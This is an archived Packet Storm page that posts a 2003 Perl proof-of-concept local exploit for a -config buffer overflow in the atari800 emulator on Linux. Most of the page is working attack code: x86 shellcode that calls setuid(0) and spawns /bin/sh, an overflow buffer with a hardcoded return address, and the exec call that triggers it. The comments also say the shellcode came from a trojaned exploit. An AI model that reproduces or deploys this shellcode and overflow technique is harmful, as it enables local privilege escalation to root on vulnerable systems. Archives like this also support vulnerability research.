exploit the possibilities

SynAtari800.pl

SynAtari800.pl
Posted Aug 5, 2003
Authored by OpTiKoOl

Local exploit for the atari800 Atari emulator on Linux. Makes use of the -config overflow. By default, this binary is not normally default on most Linux installations.

tags | exploit, overflow, local
systems | linux
MD5 | 2761f54dffd04f1ea1f5aeacd6520ec8

SynAtari800.pl

Change Mirror Download
#!perl

########################################################
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0
# based on
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0
# -
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )
# As in the advisory there's other bofs. but i just researched this one to
# make a Proof-Of-Concept Code.
# In Gentoo Linux (distro where this poc was developed) there isn't any suid
# atari800 binaries. i suppose.. :D
# -
# Tested against Atari800 from portage.
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org
# -
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol
# and a fucking shout to psychedelic ppl, you rockZ!
# Stay Fresh!

sub head {
print "#####################################################
# PoC against Atari 800 Emulator, Version 1.3.0
# by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org
# 02/08/2003, CopyLeft by OpTiKoOl ...
# http://www.syners.org/ & http://psyfreakz.org/
# -
# Big Kiss 2 Neuza ;* Chuak! Chuak!
#\n";
}

# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D

$shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0
. "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
. "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
. "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "SYNERSOWNZ" x 25;
$ENV{'SYNERS'} = $shellcode;
$buf .= "\xad\xff\xff\xbf";
&head;
exec("/usr/bin/atari800 -config $buf");

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close